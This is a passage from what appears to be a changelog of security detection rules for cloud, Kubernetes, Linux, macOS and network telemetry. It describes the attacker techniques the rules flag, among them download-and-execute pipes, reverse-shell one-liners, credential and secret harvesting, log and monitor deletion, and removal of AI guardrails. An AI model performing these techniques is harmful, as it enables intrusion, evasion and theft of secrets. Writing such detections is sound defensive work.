bedrock-agentcore.amazonaws.com. | new | 1 + +|<> | Detects an SES email identity being verified and subsequently deleted within a 30-minute window, performed by the same AWS identity. Amazon SES requires email addresses and domains to be verified before they can be used as senders. An adversary who obtains SES credentials may verify a domain or address they control, use it to send phishing or spam email, then delete the identity to remove evidence of the sending domain from the account's verified identity list. This verify-use-delete pattern is a recognized attacker technique for SES abuse. | new | 2 + +|<> | Detects a single identity listing Google Cloud Secret Manager secrets across many distinct projects in a short window. ListSecrets does not return secret values, but sweeping many projects is a common reconnaissance step before targeted AccessSecretVersion calls. Legitimate workloads typically list secrets within one project or a small set of projects; cross-project bursts from one user and source IP are uncommon outside security tooling or compromise. | new | 2 + +|<> | Detects a process execution followed by immediate self-deletion, a common technique used by adversaries to remove traces of their activity on the system. This pattern is often observed in malware and APT campaigns. | new | 1 + +|<> | This rule detects command lines that reference another process or thread's procfs syscall file. The "/proc//syscall" interface exposes the current syscall arguments, stack pointer, and instruction pointer, which can support process discovery and preparation for process injection. Self and thread-self aliases are excluded. | new | 1 + +|<> | This rule detects when a file is downloaded by curl or wget, and piped to an interpreter. Attackers may use this technique to download and execute payloads for various malicious purposes, such as establishing persistence or exfiltrating data. | new | 1 + +|<> | This rule detects the creation of a binfmt configuration file. Binfmt is a utility that is used to configure the behavior of the Linux kernel when executing binary files. By creating a malicious binfmt configuration file, threat actors can execute a backdoor script or command on the target system. | new | 1 + +|<> | Identifies execution of the macOS Screen Sharing file-copy helper SSFileCopySender with root UID/GID attributes (0 80). Under the native Apple authentication path this helper runs in the connecting user's context; execution as root is anomalous and consistent with pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400), where a flawed SRP validation path lets an unauthenticated attacker reach privileged file operations. Note that the 0/80 UID/GID pair reflects only initial exploitation attempts and can be evaded once an attacker enumerates another local account. It is advisable to treat this as a tripwire and pair it with the SSFileCopyReceiver Writing to Common Persistence Locations rule coverage. | new | 2 + +|<> | Identifies the macOS Screen Sharing file copy helper SSFileCopyReceiver creating or modifying files in common persistence locations, including system-wide and per-user LaunchDaemons/LaunchAgents, shell profiles, SSH authorized_keys, cron tabs, and hidden paths under root's home directory. SSFileCopyReceiver performs file writes with root authority on behalf of a remote viewer.Pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400) abuses this write primitive to establish persistence; observed in-the-wild activity dropped LaunchDaemons and modified shell startup files to run a cryptocurrency miner as root. | new | 2 + +|<> | Identifies a client generating many unique, unusually long DNS query names to the same registered domain within a five-minute window. Malware DNS tunnels and DNS command-and-control commonly encode data in lengthy subdomain portions under one apex domain. | new | 1 + +|<> | Identifies completed outbound TLS connections to external destinations where the server presents a recently issued, likely self-signed certificate whose issuer and subject distinguished names are equal. C2 frameworks frequently use freshly generated self-signed certificates instead of publicly trusted CAs. This behavioral logic complements hash-based C2 certificate rules, such as default Cobalt Strike team-server certificates, by catching rotated or custom infrastructure that does not reuse default tooling certificates. Distinguished-name equality identifies self-issued certificates but does not cryptographically prove that the certificate signed itself. The rule does not cover private-CA signed certificates, where issuer and subject differ, or C2 that uses publicly trusted certificates such as Let's Encrypt. | new | 2 + +|<> | Identifies a client resolving the same public registered domain to both a public IP address and a private, loopback, link-local, unique-local IPv6, or shared address. This includes both address classes being observed at the same timestamp, and a public answer followed within five minutes by a private answer where the minimum TTL across all answer records in the private-answer events is 60 seconds or less. Either pattern is consistent with DNS rebinding that pivots browser or application trust to internal resources. | new | 1 + +|<> | Identifies a successful SonicWall VPN- or WAN-zone administrator or remote-user login from a source IP that was not previously observed with the same user on the same appliance during the prior 14 days. This may indicate stolen credentials, compromised administrator access, or unauthorized remote access. | new | 1 + +|<> | Identifies creation of a ":changelist" NTFS alternate data stream or a Windows service Args registry value pointing to a ":changelist" path. Microsoft Defender's Boot-Time Removal (BTR.sys) driver reads an RC4-encrypted transaction blob from a driver ADS named ":changelist", referenced by HKLM\SYSTEM\*ControlSet*\Services\*\Args. Adversaries can reproduce this staging outside Defender to abuse BTR.sys as a signed kernel primitive for arbitrary file and registry operations. This rule focuses on non-System writers and excludes Microsoft-signed MRT.exe running as SYSTEM, which may perform related remediation staging. | new | 2 + +|<> | Detects suspicious child process execution originating from PaperCut server components, including the PaperCut NG/MF Application Server (pc-app.exe) and PaperCut Hive print job spooler (pc-printjob-spooler.exe). Active exploitation of CVE-2026-82078 and CVE-2026-81578 abuses unsafe dynamic class loading and an authentication bypass to achieve pre-authenticated remote code execution under pc-app.exe. Similar suspicious shell spawning has also been observed from PaperCut Hive's pc-printjob-spooler.exe (for example cmd.exe executing echo/test-style commands). Observed NG/MF in-the-wild activity includes discovery utilities such as whoami and tasklist; proof-of-concept exploitation has spawned unexpected Windows utilities such as charmap.exe as SYSTEM. | new | 1 + +|<> | Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. | update | 115 + +|<> | Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. | update | 4 + +|<> | Identifies a Java process that accepts an inbound network connection and then spawns a suspicious child process. This may indicate exploitation of a Java service that runs attacker-controlled code, such as one that deserializes untrusted objects. | update | 109 + +|<> | This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information. | update | 5 + +|<> | An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. | update | 320 + +|<> | Detects the first occurrence of a user identity accessing AWS Systems Manager (SSM) SecureString parameters using the GetParameter or GetParameters API actions with credentials in the request parameters. This could indicate that the user is accessing sensitive information. This rule detects when a user accesses a SecureString parameter with the withDecryption parameter set to true. This is a New Terms rule that detects the first occurrence of an AWS identity accessing SecureString parameters with decryption. | update | 10 + +|<> | Detects deletion, weakening, or version management of AWS Bedrock guardrails via the DeleteGuardrail, UpdateGuardrail, DeleteEnforcedGuardrailConfiguration, or PutEnforcedGuardrailConfiguration APIs. Bedrock guardrails enforce content, topic, word, and sensitive-information policies on model invocations. Deleting a guardrail, loosening its policies, removing or overwriting the organization-enforced guardrail configuration, or creating a new version to enforce a weakened configuration allows an adversary to bypass these protections — the cloud control-plane equivalent of disabling a security tool. This activity should be validated against approved change management and the responsible identity. | update | 2 + +|<> | Detects the deletion of one or more Amazon CloudWatch alarms using the "DeleteAlarms" API. CloudWatch alarms are critical for monitoring metrics and triggering alerts when thresholds are exceeded. An adversary may delete alarms to impair visibility, silence alerts, and evade detection following malicious activity. This behavior may occur during post-exploitation or cleanup phases to remove traces of compromise or disable automated responses. | update | 215 + +|<> | Identifies attempts to delete AWS Config resources. AWS Config provides continuous visibility into resource configuration changes and compliance posture across an account. Deleting Config components can significantly reduce security visibility and auditability. Adversaries may delete or disable Config resources to evade detection, hide prior activity, or weaken governance controls before or after other malicious actions. | update | 215 + +|<> | Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. | update | 214 + +|<> | Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. | update | 213 + +|<> | Detects the deletion of an Amazon GuardDuty detector. GuardDuty provides continuous monitoring for malicious or unauthorized activity across AWS accounts. Deleting the detector disables this visibility, stopping all threat detection and removing existing findings. Adversaries may delete GuardDuty detectors to impair security monitoring and evade detection during or after an intrusion. This rule identifies successful "DeleteDetector" API calls and can indicate a deliberate defense evasion attempt. | update | 213 + +|<> | Identifies the deletion of critical Amazon S3 bucket configurations such as bucket policies, lifecycle configurations or encryption settings. These actions are typically administrative but may also represent adversarial attempts to remove security controls, disable data retention mechanisms, or conceal evidence of malicious activity. Adversaries who gain access to AWS credentials may delete logging, lifecycle, or policy configurations to disrupt forensic visibility and inhibit recovery. For example, deleting a bucket policy can open a bucket to public access or remove protective access restrictions, while deleting lifecycle rules can prevent object archival or automatic backups. Such actions often precede data exfiltration or destructive operations and should be reviewed in context with related S3 or IAM events. | update | 215 + +|<> | Identifies the addition of an expiration lifecycle configuration to an Amazon S3 bucket. S3 lifecycle rules can automatically delete or transition objects after a defined period. Adversaries can abuse them by configuring auto-deletion of logs, forensic evidence, or sensitive objects to cover their tracks. This rule detects the use of the PutBucketLifecycle or PutBucketLifecycleConfiguration APIs with Expiration parameters, which may indicate an attempt to automate the removal of data to hinder investigation or maintain operational secrecy after malicious activity. | update | 9 + +|<> | Identifies when server access logging is disabled for an Amazon S3 bucket. Server access logs provide a detailed record of requests made to an S3 bucket. When server access logging is disabled for a bucket, it could indicate an adversary's attempt to impair defenses by disabling logs that contain evidence of malicious activity. | update | 9 + +|<> | Identifies when a specified inbound (ingress) rule is added or adjusted for a VPC security group in AWS EC2. This rule detects when a security group rule is added that allows traffic from any IP address or from a specific IP address to common remote access ports, such as 22 (SSH) or 3389 (RDP). Adversaries may add these rules to allow remote access to VPC instances from any location, increasing the attack surface and potentially exposing the instances to unauthorized access. | update | 8 + +|<> | Identifies the deletion of an AWS Web Application Firewall (WAF) Web ACL. Web ACLs are the core enforcement objects in AWS WAF, defining which traffic is inspected, allowed, or blocked for protected applications. Deleting a Web ACL removes all associated rules, protections, and logging configurations. Adversaries who obtain sufficient privileges may delete a Web ACL to disable critical security controls, evade detection, or prepare for downstream attacks such as web-application compromise, data theft, or resource abuse. Because Web ACLs are rarely deleted outside of controlled maintenance or infrastructure updates, unexpected deletions may indicate potential defense evasion. | update | 213 + +|<> | Identifies the deletion of an AWS Web Application Firewall (WAF) rule or rule group. WAF rules and rule groups enforce critical protections for web applications by filtering malicious HTTP requests, blocking known attack patterns, and enforcing access controls. Deleting these rules—even briefly—can expose applications to SQL injection, cross-site scripting, credential-stuffing bots, or targeted exploitation. Adversaries who have gained sufficient permissions may remove WAF protections as part of a broader defense evasion or impact strategy, often preceding data theft or direct application compromise. | update | 213 + +|<> | Identifies discovery request DescribeInstanceAttribute with the attribute userData and instanceId in AWS CloudTrail logs. This may indicate an attempt to retrieve user data from an EC2 instance. Adversaries may use this information to gather sensitive data from the instance such as hardcoded credentials or to identify potential vulnerabilities. This is a New Terms rule that identifies the first time an IAM user or role requests the user data for a specific EC2 instance. | update | 10 + +|<> | An adversary with access to a set of compromised credentials may attempt to verify that the credentials are valid and determine what account they are using. This rule looks for the first time an identity has called the STS GetCallerIdentity API, which may be an indicator of compromised credentials. A legitimate user would not need to perform this operation as they should know the account they are using. | update | 10 + +|<> | Detects the rare occurrence of a user or role accessing AWS Systems Manager (SSM) inventory APIs or running the AWS-GatherSoftwareInventory job. These APIs reveal detailed information about managed EC2 instances including installed software, patch compliance status, and command execution history. Adversaries may use these calls to collect software inventory while blending in with legitimate AWS operations. This is a New Terms rule that detects when a user accesses these reconnaissance APIs for the first time. | update | 4 + +|<> | Identifies when a Lambda layer is added to an existing AWS Lambda function. Lambda layers allow shared code, dependencies, or runtime modifications to be injected into a function’s execution environment. Adversaries with the ability to update function configurations may add a malicious layer to establish persistence, run unauthorized code, or intercept data handled by the function. This activity should be reviewed to ensure the modification is expected and authorized. | update | 10 + +|<> | This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. | update | 9 + +|<> | Identifies an AWS Amazon Machine Image (AMI) being shared with another AWS account. Adversaries with access may share an AMI with an external AWS account as a means of data exfiltration. AMIs can contain secrets, bash histories, code artifacts, and other sensitive data that adversaries may abuse if shared with unauthorized accounts. AMIs can be made publicly available accidentally as well. | update | 9 + +|<> | Detects when an Amazon S3 bucket policy is modified to share access with an external AWS account. This rule analyzes PutBucketPolicy events and compares the S3 bucket’s account ID to any account IDs referenced in the policy’s Effect=Allow statements. If the policy includes principals from accounts other than the bucket owner’s, the rule triggers an alert. This behavior may indicate an adversary backdooring a bucket for data exfiltration or cross-account persistence. For example, an attacker who compromises credentials could attach a policy allowing access from an external AWS account they control, enabling continued access even after credentials are rotated. Note: This rule will not alert if the account ID is part of the bucket’s name or appears in the resource ARN. Such cases are common in standardized naming conventions (e.g., “mybucket-123456789012”). To ensure full coverage, use complementary rules to monitor for suspicious PutBucketPolicy API requests targeting buckets with account IDs embedded in their names or resources. | update | 11 + +|<> | Identifies the creation or modification of an S3 bucket replication configuration that sends data to a bucket in a different AWS account. Cross-account replication can be used legitimately for backup, disaster recovery, and multi-account architectures, but adversaries with write access to an S3 bucket may abuse replication rules to silently exfiltrate large volumes of data to attacker-controlled accounts. This rule detects "PutBucketReplication" events where the configured destination account differs from the source bucket's account, indicating potential unauthorized cross-account data movement. | update | 10 + +|<> | Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. | update | 11 + +|<> | Identifies when an Amazon EventBridge rule is disabled or deleted. EventBridge rules are commonly used to automate operational workflows and security-relevant routing (for example, forwarding events to Lambda, SNS/SQS, or security tooling). Disabling or deleting a rule can break critical integrations, suppress detections, and reduce visibility. Adversaries may intentionally impair EventBridge rules to disrupt monitoring, delay response, or hide follow-on actions. | update | 214 + +|<> | Detects updates to an existing CloudTrail trail via UpdateTrail API which may reduce visibility, change destinations, or weaken integrity (e.g., removing global events, moving the S3 destination, or disabling validation). Adversaries can modify trails to evade detection while maintaining a semblance of logging. Validate any configuration change against approved baselines. | update | 217 + +|<> | Detects the deletion of an Amazon CloudWatch Log Group using the "DeleteLogGroup" API. CloudWatch log groups store operational and security logs for AWS services and custom applications. Deleting a log group permanently removes all associated log streams and historical log data, which can eliminate forensic evidence and disrupt security monitoring pipelines. Adversaries may delete log groups to conceal malicious activity, disable log forwarding, or impede incident response. | update | 216 + +|<> | Detects the deletion of an Amazon CloudWatch log stream using the "DeleteLogStream" API. Deleting a log stream permanently removes its associated log events and may disrupt security visibility, break audit trails, or suppress forensic evidence. Adversaries may delete log streams to conceal malicious actions, impair monitoring pipelines, or remove artifacts generated during post-exploitation activity. | update | 216 + +|<> | Detects when Amazon Elastic Block Store (EBS) encryption by default is disabled in an AWS region. EBS encryption ensures that newly created volumes and snapshots are automatically protected with AWS Key Management Service (KMS) keys. Disabling this setting introduces significant risk as all future volumes created in that region will be unencrypted by default, potentially exposing sensitive data at rest. Adversaries may disable encryption to weaken data protection before exfiltrating or tampering with EBS volumes or snapshots. This may be a step in preparation for data theft or ransomware-style attacks that depend on unencrypted volumes. | update | 214 + +|<> | Identifies the removal of access permissions from a shared AWS EC2 EBS snapshot. EBS snapshots are essential for data retention and disaster recovery. Adversaries may revoke or modify snapshot permissions to prevent legitimate users from accessing backups, thereby obstructing recovery efforts after data loss or destructive actions. This tactic can also be used to evade detection or maintain exclusive access to critical backups, ultimately increasing the impact of an attack and complicating incident response. | update | 8 + +|<> | Identifies the deletion of an Amazon EFS file system using the "DeleteFileSystem" API operation. Deleting an EFS file system permanently removes all stored data and cannot be reversed. This action is rare in most environments and typically limited to controlled teardown workflows. Adversaries with sufficient permissions may delete a file system to destroy evidence, disrupt workloads, or impede recovery efforts. | update | 213 + +|<> | Identifies attempts to disable or schedule the deletion of an AWS customer managed KMS Key. Disabling or scheduling a KMS key for deletion removes the ability to decrypt data encrypted under that key and can permanently destroy access to critical resources. Adversaries may use these operations to cause irreversible data loss, disrupt business operations, impede incident response, or hide evidence of prior activity. Because KMS keys often protect sensitive or regulated data, any modification to their lifecycle should be considered highly sensitive and investigated promptly. | update | 114 + +|<> | Identifies the deletion of an AWS Lambda function. Deleting a function removes its code, configuration, versions, and aliases. Adversaries may delete functions to disrupt business operations and automated workflows, to destroy attacker-deployed backdoors and remove evidence after achieving their objective, or to inhibit incident response. Because function deletion is destructive and often irreversible without redeployment, deletions performed by unexpected principals or outside change windows should be reviewed. | update | 2 + +|<> | Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global database cluster. Deleting these resources permanently destroys stored data and can cause major service disruption. Adversaries with sufficient permissions may delete RDS resources to impede recovery, destroy evidence, or inflict operational impact on the environment. | update | 213 + +|<> | Identifies the modification of an AWS RDS DB instance or cluster to disable the deletionProtection feature. Deletion protection prevents accidental or unauthorized deletion of RDS resources. Adversaries with sufficient permissions may disable this protection as a precursor to destructive actions, including the deletion of databases containing sensitive or business-critical data. This rule alerts when deletionProtection is explicitly set to false on an RDS DB instance or cluster. | update | 10 + +|<> | Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. | update | 9 + +|<> | Identifies successful AWS API calls where the CloudTrail user agent indicates offensive tooling or automated credential verification. This includes the AWS CLI or Boto3 reporting a Kali Linux distribution fingerprint (`distrib#kali`), and clients that identify as TruffleHog, which is commonly used to validate leaked secrets against live AWS APIs. These patterns are uncommon for routine production workloads and may indicate compromised credentials, unauthorized access, or security tooling operating outside approved scope. | update | 7 + +|<> | Identifies the creation of an AWS EC2 network access control list (ACL) or an entry in a network ACL with a specified rule number. Adversaries may exploit ACLs to establish persistence or exfiltrate data by creating permissive rules. | update | 214 + +|<> | Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. | update | 215 + +|<> | Detects when an uncommon user or role creates an OpenID Connect (OIDC) Identity Provider in AWS IAM. OIDC providers enable web identity federation, allowing users authenticated by external identity providers (such as Google, GitHub, or custom OIDC-compliant providers) to assume IAM roles and access AWS resources. Adversaries who have gained administrative access may create rogue OIDC providers to establish persistent, federated access that survives credential rotation. This technique allows attackers to assume roles using tokens from an IdP they control. While OIDC provider creation is benign in some environments, it should still be validated against authorized infrastructure changes. | update | 5 + +|<> | An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user. | update | 15 + +|<> | Identifies when an AWS Lambda function policy is updated to allow public invocation. This rule detects use of the AddPermission API where the Principal is set to "*", enabling any AWS account to invoke the function. Adversaries may abuse this configuration to establish persistence, create a covert execution path, or operate a function as an unauthenticated backdoor. Public invocation is rarely required outside very specific workloads and should be considered high-risk when performed unexpectedly. | update | 10 + +|<> | Identifies the creation or update of an AWS Lambda function URL configured with an authentication type of NONE, which exposes the function to unauthenticated invocation directly from the public internet. Adversaries can use a public function URL to establish a durable, internet-reachable entry point for command and control, data egress, or on-demand execution of attacker-controlled code, bypassing the need for valid AWS credentials to invoke the function. Function URLs with public access should be rare and deliberate, so this configuration warrants review. | update | 3 + +|<> | Identifies the creation or modification of an Amazon RDS DB instance or cluster where the "publiclyAccessible" attribute is set to "true". Publicly accessible RDS instances expose a network endpoint on the public internet, which may allow unauthorized access if combined with overly permissive security groups, weak authentication, or misconfigured IAM policies. Adversaries may enable public access on an existing instance, or create a new publicly accessible instance, to establish persistence, move data outside of controlled network boundaries, or bypass internal access controls. | update | 10 + +|<> | Identifies when an AWS Route 53 private hosted zone is associated with a new Virtual Private Cloud (VPC). Private hosted zones restrict DNS resolution to specific VPCs, and associating additional VPCs expands the scope of what networks can resolve internal DNS records. Adversaries with sufficient permissions may associate unauthorized VPCs to intercept, observe, or reroute internal traffic, establish persistence, or expand their visibility within an AWS environment. | update | 214 + +|<> | Identifies when an EC2 Route Table has been created. Route tables can be used by attackers to disrupt network traffic, reroute communications, or maintain persistence in a compromised environment. This is a New Terms rule that detects the first instance of this behavior by a user or role. | update | 215 + +|<> | Identifies successful IAM API calls that create a new customer managed policy version or set the default version for an existing customer managed policy. Attackers with `iam:CreatePolicyVersion` or `iam:SetDefaultPolicyVersion` on a privileged policy can introduce a permissive policy document and activate it, escalating effective permissions without attaching a new policy. These APIs are high impact when the target policy is attached to powerful roles or users. | update | 2 + +|<> | Identifies successful PutKeyPolicy calls on AWS KMS keys. The key policy is a resource-based policy that controls which principals can use the key for cryptographic operations and administration. Adversaries with "kms:PutKeyPolicy" may add or broaden principals (including external accounts) to decrypt or exfiltrate data protected by the key, or to preserve access after other credentials are rotated. This is distinct from disabling or scheduling deletion of the key. | update | 2 + +|<> | Identifies when an application accesses SharePoint Online or OneDrive for Business for the first time in the tenant within a specified timeframe. This detects successful OAuth phishing campaigns, illicit consent grants, or compromised third-party applications gaining initial access to file storage. Adversaries often use malicious OAuth applications or phishing techniques to gain consent from users, allowing persistent access to organizational data repositories without traditional credential theft. | update | 7 + +|<> | Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. | update | 6 + +|<> | Detects rare non-interactive sign-ins where an Entra ID client application authenticates on behalf of a principal user using an application (client) ID that is not commonly associated with that user's historical sign-in behavior. Adversaries with stolen credentials or OAuth tokens may abuse Entra ID–managed or first-party client IDs to perform on-behalf-of (OBO) authentication, blending into legitimate cloud traffic while avoiding traditional interactive sign-in flows. This technique is commonly observed in OAuth phishing, token theft, and access broker operations, and may precede lateral movement, persistence, or data access via Microsoft Graph or other cloud resources. The rule uses a New Terms approach to identify first-seen combinations of the UPN and Client ID within a defined history window, helping surface unexpected client usage that may indicate compromised identities, malicious automation, or unauthorized application impersonation. | update | 9 + +|<> | Identifies rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. | update | 9 + +|<> | Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user and is not managed, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. | update | 4 + +|<> | Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. | update | 4 + +|<> | Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa with the actual caller identity in the impersonatedUser field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. This rule uses a 5-day new-terms history window keyed on the impersonated identity and alerts the first time that Azure AD principal performs this activity. | update | 3 + +|<> | Detects Kubernetes pod exec sessions whose decoded command line references cloud instance metadata endpoints or equivalent hostnames and paths. Workloads that reach the link-local metadata IP, AWS IMDS paths, GCP computeMetadata, Azure IMDS token routes, or encoded variants are often attempting to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor boundary. That behavior is high risk in multi-tenant and regulated environments because it can expose short-lived cloud credentials to code running inside a container. The rule classifies a coarse cloud target label and whether the string looks like credential retrieval versus lighter reconnaissance. | update | 2 + +|<> | Detects Kubernetes pod exec sessions whose decoded command line references high-value host or in-cluster paths and material types: mounted service account or platform tokens, kubelet and control-plane configuration areas, host identity stores, root dot-directories for cloud and kubeconfig material, common private-key and keystore extensions, process environment dumps, and configuration filenames suggestive of embedded secrets. The intent is to catch interactive or scripted access that often precedes lateral movement, privilege escalation, or credential theft from the node or workload boundary. A narrow exclusion ignores benign reads of resolv.conf. The query also labels an access_type bucket to speed triage without altering the detection predicates you validated. | update | 2 + +|<> | Detects read access to Kubernetes Secrets (get/list) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). | update | 2 + +|<> | Kubernetes audit identities for kubelet (system:node:*) and workloads (system:serviceaccount:*) are meant to operate with tight, predictable API usage. Direct get or list on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). | update | 4 + +|<> | Detects list operations on Kubernetes Secrets from a non-loopback client when the request URI targets cluster-wide secrets or list operations under kube-system or default. Useful for spotting broad secret enumeration from remote clients. | update | 3 + +|<> | Detects pod or attach exec API calls where the decoded request query implies curl or wget fetching an https URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies noise filters for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. | update | 2 + +|<> | Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell one-liners invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together these patterns align with post-exploitation interactive access and command-and-control. | update | 2 + +|<> | This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. Adversaries may collect data stored in the clipboard from users copying information within or between applications. | update | 11 + +|<> | Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. | update | 216 + +|<> | Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking. | update | 9 + +|<> | This rule leverages the "new_terms" rule type to detect unusual file creations originating from web server processes on Linux systems. Attackers may exploit web servers to maintain persistence on a compromised system, often resulting in atypical file creations. As file creations from web server processes are common, the "new_terms" rule type approach helps to identify deviations from normal behavior. | update | 2 + +|<> | Identifies potentially suspicious use of unshare to create a user namespace context followed by a UID change event indicating a transition to root. Adversaries may use unshare-based primitives as part of local privilege escalation chains. This rule is intentionally generic and can surface multiple local privesc patterns beyond a single CVE. | update | 13 + +|<> | Detects potential privilege escalation under the root effective user when the real user and parent user are not root, indicative of the execution of binaries with SUID or SGID bits set. | update | 3 + +|<> | Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement. | update | 113 + +|<> | Identifies the access or file open of web browser sensitive files by an untrusted/unsigned process or osascript. Adversaries may acquire credentials from web browsers by reading files specific to the target browser. | update | 216 + +|<> | Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. | update | 115 + +|<> | Detects use of the systemsetup command to enable remote SSH Login. | update | 113 + +|<> | Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. | update | 213 + +|<> | Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. | update | 112 + +|<> | Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control. | update | 109 + +|<> | This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. | update | 113 + +|<> | This rule identifies outbound IPSEC NAT Traversal (NAT-T) traffic to an external destination IP that was not observed during the previous 5 days. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal encapsulates IPSEC ESP traffic in UDP and, once a NAT device is detected, both peers float to UDP port 4500 for the tunnel data channel. Newly observed external NAT-T peers may indicate unauthorized VPN use or an adversary tunneling command and control or exfiltration traffic over the Internet. | update | 113 + +|<> | This rule detects events that may indicate use of SMTP on TCP port 26 from an internal host to an external destination. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. The rule is scoped to outbound traffic (internal source to external destination) to focus on the command and control and exfiltration use cases, rather than benign internal mail relays or unrelated transit traffic observed by the sensor. | update | 114 + +|<> | This rule detects 